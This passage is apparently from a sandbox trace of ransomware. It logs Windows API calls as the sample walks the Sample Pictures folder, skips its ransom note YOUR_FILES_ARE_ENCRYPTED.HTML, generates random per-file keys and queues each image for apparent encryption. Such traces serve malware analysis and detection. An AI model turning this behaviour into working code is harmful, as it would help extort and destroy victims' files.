(in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0171.635] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=879394) returned 1 [0171.635] GetProcessHeap () returned 0x270000 [0171.635] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0171.637] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="92") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="E2") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="E2") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C9") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="5E") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="4F") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="5A") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A4") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BF") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7F") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="B9") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1D") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="97") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="25") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="58") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="66") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="14") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="38") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="8F") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F6") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="91") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="89") returned 2 [0171.637] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="D9") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6E") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E9") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="04") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A6") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="05") returned 2 [0171.638] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="58") returned 2 [0171.638] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" [0171.638] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.638] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0171.638] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x60, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0171.638] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0171.638] lstrcmpW (lpString1="Desert.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.638] PathFindExtensionW (pszPath="Desert.jpg") returned=".jpg" [0171.639] lstrlenW (lpString=".jpg") returned 4 [0171.639] PathFindExtensionW (pszPath="Desert.jpg") returned=".jpg" [0171.639] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0171.639] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=845941) returned 1 [0171.639] GetProcessHeap () returned 0x270000 [0171.639] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78c1008 [0171.643] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="53") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3A") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="44") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="8C") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="38") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="90") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A9") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C9") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="04") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="60") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="73") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="54") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="82") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="51") returned 2 [0171.643] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B7") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="8B") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="51") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="46") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F7") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AB") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="EE") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7D") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="82") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E3") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="7A") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="20") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="43") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A1") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6C") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="F1") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="AB") returned 2 [0171.644] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="69") returned 2 [0171.645] lstrcpyW (in: lpString1=0x78d10bc, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" [0171.645] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x78c1008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.645] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78c1008, lpOverlapped=0x78c1008) returned 1 [0171.645] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.645] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0171.645] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.645] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.645] lstrlenW (lpString=".ini") returned 4 [0171.645] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.645] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x60, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0171.645] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0171.645] lstrcmpW (lpString1="Hydrangeas.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.645] PathFindExtensionW (pszPath="Hydrangeas.jpg") returned=".jpg" [0171.645] lstrlenW (lpString=".jpg") returned 4 [0171.645] PathFindExtensionW (pszPath="Hydrangeas.jpg") returned=".jpg" [0171.645] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0171.648] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=595284) returned 1 [0171.648] GetProcessHeap () returned 0x270000 [0171.648] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78e9160 [0171.650] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D2") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BC") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FC") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B9") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="90") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="3C") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6E") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CF") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="75") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C4") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="48") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="64") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="22") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="2A") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="4B") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CB") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EE") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="77") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="ED") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D5") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="2E") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D9") returned 2 [0171.650] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="BA") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="8D") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F2") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="6B") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3E") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B5") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="8A") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D9") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="F9") returned 2 [0171.651] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="34") returned 2 [0171.651] lstrcpyW (in: lpString1=0x78f9214, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" [0171.651] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x78e9160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.651] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78e9160, lpOverlapped=0x78e9160) returned 1 [0171.651] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x60, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0171.652] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0171.652] lstrcmpW (lpString1="Jellyfish.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.652] PathFindExtensionW (pszPath="Jellyfish.jpg") returned=".jpg" [0171.652] lstrlenW (lpString=".jpg") returned 4 [0171.652] PathFindExtensionW (pszPath="Jellyfish.jpg") returned=".jpg" [0171.652] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0171.654] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=775702) returned 1 [0171.654] GetProcessHeap () returned 0x270000 [0171.654] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8ef8 [0171.662] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="FC") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="1B") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D1") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="11") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C7") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1A") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8B") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="1F") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0B") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="71") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C3") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="86") returned 2 [0171.662] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CC") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="3E") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F3") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5B") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="50") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="C2") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A1") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B2") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="6A") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="24") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8E") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="04") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A0") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="90") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="12") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7B") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="86") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="8F") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="46") returned 2 [0171.663] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5D") returned 2 [0171.664] lstrcpyW (in: lpString1=0x76c8fac, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" [0171.664] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8ef8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.664] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8ef8, lpOverlapped=0x76b8ef8) returned 1 [0171.664] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x60, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0171.664] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0171.664] lstrcmpW (lpString1="Koala.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.664] PathFindExtensionW (pszPath="Koala.jpg") returned=".jpg" [0171.664] lstrlenW (lpString=".jpg") returned 4 [0171.664] PathFindExtensionW (pszPath="Koala.jpg") returned=".jpg" [0171.664] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x604 [0171.665] GetFileSizeEx (in: hFile=0x604, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=780831) returned 1 [0171.665] GetProcessHeap () returned 0x270000 [0171.665] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76e1050 [0171.667] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DA") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="51") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F0") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="35") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="49") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="64") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DE") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D8") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3A") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="AE") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4E") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D2") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="54") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C9") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C2") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="DE") returned 2 [0171.667] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="AD") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4C") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="82") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A0") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="48") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="14") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="6D") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="0B") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0E") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="C7") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="45") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="6C") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="9A") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="87") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="20") returned 2 [0171.668] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="70") returned 2 [0171.669] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" [0171.669] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.669] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0171.669] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 